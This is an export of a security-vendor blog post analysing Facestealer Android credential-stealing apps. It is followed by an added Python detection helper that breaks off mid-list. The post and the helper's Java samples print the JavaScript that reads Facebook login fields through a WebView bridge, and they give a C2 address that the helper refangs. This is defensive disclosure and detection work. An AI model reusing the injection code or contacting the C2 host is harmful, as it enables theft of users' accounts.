{"id":90617,"date":"2022-03-14T14:49:19","date_gmt":"2022-03-14T09:19:19","guid":{"rendered":"https:\/\/blogs.quickheal.com\/?p=90617"},"modified":"2023-02-15T15:08:28","modified_gmt":"2023-02-15T09:38:28","slug":"stay-alert-of-facebook-credential-stealer-applications-stealing-users-credentials","status":"publish","type":"post","link":"https:\/\/www.quickheal.com\/blogs\/stay-alert-of-facebook-credential-stealer-applications-stealing-users-credentials\/","title":{"rendered":"Stay Alert of Facebook Credential Stealer Applications Stealing User&#8217;s Credentials."},"content":{"rendered":"<p>Social media credentials are always a lucrative target for threat actors, who use various techniques to obtain them. Some use overlays with fake user interfaces, some use key-logging, and some use simple social engineering to trap users. Another technique threat actors have used in the recent past is JavaScript code injection into a WebView: the app loads the genuine Facebook login page inside a WebView and injects a script that reads the credentials as the user enters them and <a href=\"https:\/\/blogs.quickheal.com\/can-facebook-account-misused-hacked\/\">hands them to the attacker<\/a>.<\/p>\n<p>In January 2022, Quick Heal Security Labs found several Facebook credential stealer applications on the Google Play Store that use different techniques to hide their JavaScript code. Android researchers refer to this family of <a href=\"https:\/\/blogs.quickheal.com\/can-facebook-account-misused-hacked\/\">Facebook credential<\/a> stealers as &#8220;<strong>Facestealer.<\/strong>&#8221;<\/p>\n<h2 style=\"font-size: 27px;\"><strong>How dangerous is this?<\/strong><\/h2>\n<p>If the Facebook credentials are harvested successfully, the attacker gets access to the user&#8217;s personal information such as personal details, friend lists, relationship details, activities, private posts &amp; messages, photos\/videos, life events, etc. 
and can then perform malicious activities. For example, attackers can<\/p>\n<ul>\n<li>Impersonate the real user and use the data for malicious activities like phishing and spoofing.<\/li>\n<li>Use the compromised account to distribute spam messages, malicious links, malware files, etc.<\/li>\n<li>Blackmail the victim with the collected private data for financial or other gain.<\/li>\n<li>Damage the victim&#8217;s social reputation.<\/li>\n<li>Change the victim&#8217;s personal details.<\/li>\n<li>Publish unwanted posts from the victim&#8217;s account.<\/li>\n<li>Compromise the victim&#8217;s other social media and professional accounts using the collected information.<\/li>\n<\/ul>\n<p>So, losing Facebook credentials to attackers can be very dangerous, as it can lead to several unforeseen consequences.<\/p>\n<h2 style=\"font-size: 27px;\"><strong>What Did Quick Heal Security Labs Do About This?<\/strong><\/h2>\n<p>Quick Heal Security Labs reported the following applications to Google, and Google took prompt action (see Fig. 
2) and removed them from the Google Play Store.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-90618 aligncenter\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2022\/03\/Fig_1_img-300x69.png\" alt=\"\" width=\"618\" height=\"142\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_1_img-300x69.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_1_img-650x149.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_1_img-768x176.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_1_img-789x181.png 789w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_1_img.png 1108w\" sizes=\"(max-width: 618px) 100vw, 618px\" \/><\/p>\n<p style=\"text-align: center;\">Fig. 1. Reported applications on the Google Play Store with their download counts<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-90619 aligncenter\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2022\/03\/Fig_2_google_reply-300x228.png\" alt=\"\" width=\"730\" height=\"555\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_2_google_reply-300x228.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_2_google_reply-513x390.png 513w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_2_google_reply-768x583.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_2_google_reply-789x599.png 789w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_2_google_reply.png 1332w\" sizes=\"(max-width: 730px) 100vw, 730px\" \/><\/p>\n<p style=\"text-align: center;\">Fig. 2. Report e-mail sent to Google and Google&#8217;s confirmation<\/p>\n<p><strong>Below is a technical analysis of these applications.<\/strong><\/p>\n<p><strong>#1. 
Application Name:<\/strong> PicsArt<\/p>\n<p><strong>MD5<\/strong>: db95ae3cc6697bc9169fc9d6566a97bc<\/p>\n<p>This application uses several layers of string encryption to evade AV engine detection and to make analysis harder for researchers.<\/p>\n<p>This application:<\/p>\n<ul>\n<li>Opens with a PicsArt screen (shown in the middle of Fig. 3).<\/li>\n<li>Then redirects to the next page, which asks for Facebook credentials.<\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-90620 aligncenter\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2022\/03\/Fig_3_Pic-300x215.png\" alt=\"\" width=\"654\" height=\"468\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_3_Pic-300x215.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_3_Pic-545x390.png 545w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_3_Pic-768x550.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_3_Pic-1536x1099.png 1536w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_3_Pic-789x565.png 789w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_3_Pic.png 1632w\" sizes=\"(max-width: 654px) 100vw, 654px\" \/><\/p>\n<p style=\"text-align: center;\">Fig. 3. Application launch and the Facebook credential prompt<\/p>\n<p>In the background, the application makes a request to the URL hxxps[:]\/\/mago[.]qfoster[.]shop\/PHP\/submit\/data.<\/p>\n<p>Fig. 4 
shows the code the application executes to make this request.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-90621 aligncenter\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2022\/03\/Fig_4_First_req_code-300x32.png\" alt=\"\" width=\"806\" height=\"86\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_4_First_req_code-300x32.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_4_First_req_code-650x69.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_4_First_req_code-768x81.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_4_First_req_code-789x84.png 789w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_4_First_req_code.png 1094w\" sizes=\"(max-width: 806px) 100vw, 806px\" \/><\/p>\n<p style=\"text-align: center;\">Fig. 4. Code for the request above<\/p>\n<p>The application receives an encrypted response, shown in Fig. 5.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-90622 aligncenter\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2022\/03\/Fig_5_received_res-300x133.png\" alt=\"\" width=\"812\" height=\"360\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_5_received_res-300x133.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_5_received_res-650x287.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_5_received_res-768x339.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_5_received_res-789x349.png 789w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_5_received_res.png 1102w\" sizes=\"(max-width: 812px) 100vw, 812px\" \/><\/p>\n<p style=\"text-align: center;\">Fig. 5. 
Response from the C2 server to the application&#8217;s request<\/p>\n<p>The application decrypts the received data as shown in Fig. 6.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-90624 aligncenter\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2022\/03\/Fig_6_response_decryption_flow-197x300.png\" alt=\"\" width=\"551\" height=\"839\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_6_response_decryption_flow-197x300.png 197w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_6_response_decryption_flow-256x390.png 256w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_6_response_decryption_flow.png 566w\" sizes=\"(max-width: 551px) 100vw, 551px\" \/><\/p>\n<p style=\"text-align: center;\">Fig. 6. Decryption flow for the response data<\/p>\n<p>The decryption is layered: a DES\/CBC decryption and a Base64 decoding step yield intermediate data, and an AES\/CBC decryption and a further Base64 decoding step yield the final plaintext response. Because the application must carry everything it needs to decrypt the response, this layering only hinders static analysis; it does not protect the data from anyone who has the APK.<\/p>\n<p>Fig. 7 shows the final decrypted output of this process. 
The application uses this decrypted data in the later stages.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-90625 aligncenter\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2022\/03\/Fig_7_dycrypted_response-300x178.png\" alt=\"\" width=\"724\" height=\"430\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_7_dycrypted_response-300x178.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_7_dycrypted_response-650x385.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_7_dycrypted_response-768x455.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_7_dycrypted_response-789x467.png 789w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_7_dycrypted_response.png 1300w\" sizes=\"(max-width: 724px) 100vw, 724px\" \/><\/p>\n<p style=\"text-align: center;\">Fig. 7. Final decrypted response data<\/p>\n<p>The application saves this decrypted data in a SharedPreferences file, <strong>x86m.xml<\/strong>, for later use.<\/p>\n<p>Fig. 8 shows the contents of x86m.xml.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-90626 aligncenter\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2022\/03\/Fig_8_x86_xml-300x51.png\" alt=\"\" width=\"651\" height=\"111\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_8_x86_xml-300x51.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_8_x86_xml-650x111.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_8_x86_xml-768x131.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_8_x86_xml-789x135.png 789w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_8_x86_xml.png 856w\" sizes=\"(max-width: 651px) 100vw, 651px\" \/><\/p>\n<p style=\"text-align: center;\">Fig. 8. 
SharedPreferences file x86m.xml contents<\/p>\n<p>The application then uses these values to obtain the Facebook URL and the JavaScript injection code.<\/p>\n<p>Here, C0151a.m855b() reads the values from the shared preference file \u201cx86m.xml\u201d and C0152a.m930a() decrypts them. The decrypted JavaScript injection code is:<\/p>\n<p><strong>javascript:window.assi.showAsd(document.getElementById(&#8216;m_login_email&#8217;).value,document.getElementById(&#8216;m_login_password&#8217;).value);<\/strong><\/p>\n<p>The script reads the e-mail and password inputs of the genuine Facebook mobile login form by their element IDs and passes both values to <strong>assi<\/strong>, a Java object the application exposes to page JavaScript through the WebView JavaScript interface (addJavascriptInterface()). That bridge is what lets page-side JavaScript call back into application code with the captured values.<\/p>\n<p>Fig. 9 shows the code that decrypts the Facebook URL and the JavaScript injection code and executes the injection.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-90627 aligncenter\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2022\/03\/Fig_9_Javascrypt_dec_url_dec_JS_injection_code-300x128.png\" alt=\"\" width=\"757\" height=\"323\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_9_Javascrypt_dec_url_dec_JS_injection_code-300x128.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_9_Javascrypt_dec_url_dec_JS_injection_code-650x278.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_9_Javascrypt_dec_url_dec_JS_injection_code-768x329.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_9_Javascrypt_dec_url_dec_JS_injection_code-789x337.png 789w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_9_Javascrypt_dec_url_dec_JS_injection_code.png 858w\" sizes=\"(max-width: 757px) 100vw, 757px\" \/><\/p>\n<p style=\"text-align: center;\">Fig. 9. Code for opening the official Facebook page and injecting the JavaScript<\/p>\n<p>Fig. 10 shows the decryption flow for this data. It takes the value of the &#8220;desc&#8221; key from the shared preference file. 
Then it applies AES\/ECB decryption two times, followed by Base64 decoding, to obtain the final JavaScript code.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-90628 aligncenter\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2022\/03\/Fig_10_JS_code_decryption_flow-300x253.png\" alt=\"\" width=\"600\" height=\"506\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_10_JS_code_decryption_flow-300x253.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_10_JS_code_decryption_flow-463x390.png 463w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_10_JS_code_decryption_flow.png 567w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/p>\n<p style=\"text-align: center;\">Fig. 10. JavaScript injection code decryption flow<\/p>\n<p>To obtain the Facebook URL, the decryption function is called inside the WebView.loadUrl() call.<\/p>\n<p>This decryption function:<\/p>\n<ul>\n<li>Takes the value of the &#8220;private&#8221; key from the shared preference file<\/li>\n<li>Applies AES\/ECB decryption followed by Base64 decoding to get the first intermediate data<\/li>\n<li>Applies DES\/CBC decryption followed by Base64 decoding to get the second intermediate data<\/li>\n<li>Applies AES\/ECB decryption followed by Base64 decoding to get the final URL value<\/li>\n<\/ul>\n<p>The above steps are shown in Fig. 
11.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-90629 aligncenter\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2022\/03\/Fig_11_FB_url_decryption_flow-184x300.png\" alt=\"\" width=\"637\" height=\"1038\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_11_FB_url_decryption_flow-184x300.png 184w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_11_FB_url_decryption_flow-240x390.png 240w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_11_FB_url_decryption_flow.png 561w\" sizes=\"(max-width: 637px) 100vw, 637px\" \/><\/p>\n<p style=\"text-align: center;\">Fig. 11. Facebook URL decryption flow<\/p>\n<p>The injected JavaScript then calls the bridge function &#8220;showAsd&#8221; with the captured e-mail address and password.<\/p>\n<p>This function stores the values in another shared preference file, &#8220;FILE_KPx86m&#8221;, as shown in Fig. 12.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-90630 aligncenter\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2022\/03\/Fig_12_js_fn_puting_stolen_data_in_xml-1-300x85.png\" alt=\"\" width=\"576\" height=\"163\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_12_js_fn_puting_stolen_data_in_xml-1-300x85.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_12_js_fn_puting_stolen_data_in_xml-1.png 556w\" sizes=\"(max-width: 576px) 100vw, 576px\" \/><\/p>\n<p style=\"text-align: center;\">Fig. 12. Code that stores the collected information in one file<\/p>\n<p>The code in Fig. 13 prepares the collected data for submission:<\/p>\n<ul>\n<li>It reads the data from the FILE_KPx86m file<\/li>\n<li>It first encrypts it with AES\/CBC<\/li>\n<li>Then with DES\/ECB<\/li>\n<li>Then it sends the encrypted data to the C&amp;C server<\/li>\n<\/ul>\n<p>Fig. 
14 shows the request that posts the encrypted data to the C2 server.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-90631 aligncenter\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2022\/03\/Fig_13_encr_jsonobj-300x195.png\" alt=\"\" width=\"621\" height=\"404\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_13_encr_jsonobj-300x195.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_13_encr_jsonobj-599x390.png 599w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_13_encr_jsonobj.png 657w\" sizes=\"(max-width: 621px) 100vw, 621px\" \/><\/p>\n<p style=\"text-align: center;\">Fig. 13. Encrypting the collected data<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-90632 aligncenter\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2022\/03\/Fig_14_posturl-300x58.png\" alt=\"\" width=\"720\" height=\"139\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_14_posturl-300x58.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_14_posturl.png 898w\" sizes=\"(max-width: 720px) 100vw, 720px\" \/><\/p>\n<p style=\"text-align: center;\">Fig. 14. Posting the collected data to the C2 server<\/p>\n<p><strong>#2. Application name:<\/strong> smart scanner<\/p>\n<p><strong>MD5<\/strong>: 38a72e3b36c4b44bf22c0ce78ec668d1<\/p>\n<p>The second reported application, smart scanner, is less complex.<\/p>\n<p>This application opens with the smart scanner default screen (shown in the middle of Fig. 15). 
After the user taps the Login with Facebook button, it opens the third screen, which asks the user to log in with Facebook credentials.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-90633 aligncenter\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2022\/03\/Fig_15_smart_scanner-300x212.png\" alt=\"\" width=\"530\" height=\"374\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_15_smart_scanner-300x212.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_15_smart_scanner-551x390.png 551w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_15_smart_scanner-768x544.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_15_smart_scanner-1536x1088.png 1536w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_15_smart_scanner.png 1644w\" sizes=\"(max-width: 530px) 100vw, 530px\" \/><\/p>\n<p style=\"text-align: center;\">Fig. 15. Smart scanner application launch<\/p>\n<p>This application uses far less encryption than the first one.<\/p>\n<p>As shown in the first part of Fig. 
16:<\/p>\n<ul>\n<li>The application opens the official Facebook login page in a WebView.<\/li>\n<li>It registers a JavaScript interface on the WebView under the name &#8220;jshandler&#8221;.<\/li>\n<li>In part 2, the JavaScript code reads the e-mail and password values from the login form.<\/li>\n<li>In part 3, it builds a JSON object with this data.<\/li>\n<li>In part 4, it sends the JSON object to the C2 server. Because this application applies little encryption, the injected script, the form element IDs and the C2 address are far easier to spot in static analysis than in the first application.<\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-90634 aligncenter\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2022\/03\/Fig_16_malicious_code-261x300.png\" alt=\"\" width=\"705\" height=\"810\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_16_malicious_code-261x300.png 261w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_16_malicious_code-340x390.png 340w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_16_malicious_code-768x882.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_16_malicious_code-789x906.png 789w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/Fig_16_malicious_code.png 996w\" sizes=\"(max-width: 705px) 100vw, 705px\" \/><\/p>\n<p style=\"text-align: center;\">Fig. 16. Malicious code of the application<\/p>\n<p><strong>IOCs:<\/strong><\/p>\n<p>Quick Heal Security Labs detects these apps as variants of Android.
Facestealer<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-90638 aligncenter\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2022\/03\/17_IOC_list-300x60.png\" alt=\"\" width=\"715\" height=\"143\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/17_IOC_list-300x60.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/17_IOC_list-650x131.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2022\/03\/17_IOC_list.png 696w\" sizes=\"(max-width: 715px) 100vw, 715px\" \/><\/p>\n<p>Theft of social media credentials is often treated as less severe than theft of financial credentials. As stated earlier, it is a serious issue in its own right, and users should understand the risks involved.<br \/>\nMalware authors spread these applications on the Google Play Store disguised as photo editing and PDF applications, which users install without much thought. Users should avoid logging in with their social media accounts in such applications, and should be especially wary of any app that shows a Facebook login form inside the app itself instead of handing off to the Facebook app or the browser.<\/p>\n<h2 style=\"font-size: 27px;\"><strong>How can users secure their Facebook account?<\/strong><\/h2>\n<p>Users should use the features Facebook provides to secure their account, such as<\/p>\n<ul>\n<li><a href=\"https:\/\/www.facebook.com\/help\/148233965247823\">Two-factor authentication<\/a><\/li>\n<li><a href=\"https:\/\/www.facebook.com\/help\/213343062033160\">Trusted contacts<\/a><\/li>\n<\/ul>\n<p>These features limit the damage if credentials are stolen: with two-factor authentication enabled, a stolen e-mail address and password alone are not enough to log in.<\/p>\n<p>Quick Heal Security Labs continuously checks applications from the Google Play Store for such malware.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Social media credentials are always a lucrative thing for threat actors. 
They use various techniques to get them. Some use overlays with fake user interfaces, some use key-logging, and some use simple social engineering to trap users. Another technique threat actors have used in the recent past is JavaScript code injection into a WebView to [&hellip;]<\/p>\n","protected":false},"author":61,"featured_media":90663,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[55,41],"tags":[431,1891,901,534,282,1892,1890,49],"class_list":["post-90617","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-android","category-facebook","tag-android","tag-credentialstealer","tag-cyberattack","tag-cybersecurity","tag-facebook-2","tag-facestealer","tag-googleplay","tag-malware"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/90617"}],"collection":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/users\/61"}],"replies":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/comments?post=90617"}],"version-history":[{"count":30,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/90617\/revisions"}],"predecessor-version":[{"id":91414,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/90617\/revisions\/91414"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/media\/90663"}],"wp:attachment":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/media?parent=90617"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/categories?post=90617"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.quickheal.com\/bl
ogs\/wp-json\/wp\/v2\/tags?post=90617"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
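The following is an added example, not code from the Quick Heal post or from either of the analysed applications. It is a small Python triage helper for the pattern both analyses above describe: a Java object exposed to page JavaScript through a WebView JavaScript interface (addJavascriptInterface()), plus an injected javascript: URL that reads the m_login_email and m_login_password fields of Facebook's mobile login page. It scores decompiled Java source for those indicators, keeps flagging the PicsArt-style case where the payload and URL only exist after runtime decryption (so no Facebook string is visible statically), and refangs the post's defanged C2 URL to match it against proxy-log lines. The Java snippets and log lines are constructed for illustration; the class names LoginActivity, MainActivity, JsHandler and C0153b and the bridge method grab() are hypothetical, while C0151a.m855b() and C0152a.m930a() are the method names cited in the post.

```python
"""Triage helpers for Facestealer-style Android credential stealers.

Added example, not code from the Quick Heal post or the analysed apps.
(1) scan_source()/verdict(): static check of decompiled Java for the
    WebView JavaScript-bridge credential-theft pattern.
(2) refang()/find_c2_traffic(): match the post's defanged C2 URL against
    proxy-log lines.
All Java snippets and log lines below are constructed; LoginActivity,
MainActivity, JsHandler, C0153b and grab() are hypothetical names.
"""
import re
from urllib.parse import urlparse

# Source-level indicators of the pattern in Fig. 9 and Fig. 16 of the post.
INDICATORS = {
    "js_enabled":        re.compile(r"setJavaScriptEnabled\s*\(\s*true\s*\)"),
    "js_bridge":         re.compile(r"addJavascriptInterface\s*\("),
    "js_annotation":     re.compile(r"@JavascriptInterface"),
    # loadUrl("javascript:...") with the payload in clear text (smart scanner style)
    "js_inject_literal": re.compile(r'loadUrl\s*\(\s*"javascript:'),
    # loadUrl(someCall(...)): URL/payload built at runtime (PicsArt style)
    "js_inject_dynamic": re.compile(r"loadUrl\s*\(\s*[A-Za-z_][\w.]*\s*\("),
    "fb_login_fields":   re.compile(r"m_login_(email|password)"),
    "fb_login_url":      re.compile(r"https?://(m|www)\.facebook\.com/login"),
}


def scan_source(java_src: str) -> dict:
    """Return {indicator_name: matched?} for one decompiled source file."""
    return {name: bool(rx.search(java_src)) for name, rx in INDICATORS.items()}


def verdict(hits: dict) -> str:
    """Classify a scan result. A bridge plus a runtime-built loadUrl argument is
    reported even without any visible Facebook string, because string
    encryption (as in the PicsArt sample) hides the payload from static matching."""
    bridge = hits["js_bridge"] or hits["js_annotation"]
    if bridge and hits["js_inject_literal"] and hits["fb_login_fields"]:
        return "facestealer-like: clear-text JavaScript reads Facebook login fields via bridge"
    if bridge and hits["js_inject_dynamic"]:
        return "suspicious: JavaScript bridge with runtime-built loadUrl argument; needs dynamic analysis"
    if bridge:
        return "review: JavaScript bridge present, no injection pattern found"
    return "no WebView credential-bridge pattern"


# --- constructed samples (hypothetical class/method names) -------------------
SMART_SCANNER_LIKE = r'''
public class LoginActivity extends Activity {
    WebView web;
    protected void onCreate(Bundle b) {
        web.getSettings().setJavaScriptEnabled(true);
        web.addJavascriptInterface(new JsHandler(), "jshandler");
        web.loadUrl("https://m.facebook.com/login");
    }
    public void onPageFinished(WebView v, String url) {
        v.loadUrl("javascript:window.jshandler.grab(document.getElementById('m_login_email').value,document.getElementById('m_login_password').value);");
    }
    class JsHandler {
        @JavascriptInterface public void grab(String email, String password) { /* build JSON, POST to C2 */ }
    }
}
'''

PICSART_LIKE = r'''
public class MainActivity extends Activity {
    void start() {
        WebView web = new WebView(this);
        web.getSettings().setJavaScriptEnabled(true);
        web.addJavascriptInterface(new C0153b(), "assi");
        web.loadUrl(C0152a.m930a(C0151a.m855b("private")));   // URL decrypted at runtime
    }
    public void onPageFinished(WebView v, String url) {
        v.loadUrl(C0152a.m930a(C0151a.m855b("desc")));       // JS payload decrypted at runtime
    }
}
'''

BENIGN = r'''
WebView web = findViewById(R.id.help);
web.getSettings().setJavaScriptEnabled(true);
web.loadUrl("https://example.com/help");
'''

# --- network IOC from the post --------------------------------------------
DEFANGED_C2 = "hxxps[:]//mago[.]qfoster[.]shop/PHP/submit/data"


def refang(ioc: str) -> str:
    """Undo common defanging (hxxp, [:], [.]) so the IOC can be matched."""
    return ioc.replace("hxxp", "http").replace("[:]", ":").replace("[.]", ".")


def find_c2_traffic(log_lines, defanged_url: str = DEFANGED_C2):
    """Return log lines that contact the C2 host. Matching the host rather than
    the full URL also catches other paths on the same server."""
    host = urlparse(refang(defanged_url)).hostname
    return [line for line in log_lines if host in line.lower()]


PROXY_LOG = [  # constructed sample lines
    "2022-01-20T10:02:11Z 10.0.0.12 POST https://mago.qfoster.shop/PHP/submit/data 200 412",
    "2022-01-20T10:02:13Z 10.0.0.12 GET https://m.facebook.com/login 200 18330",
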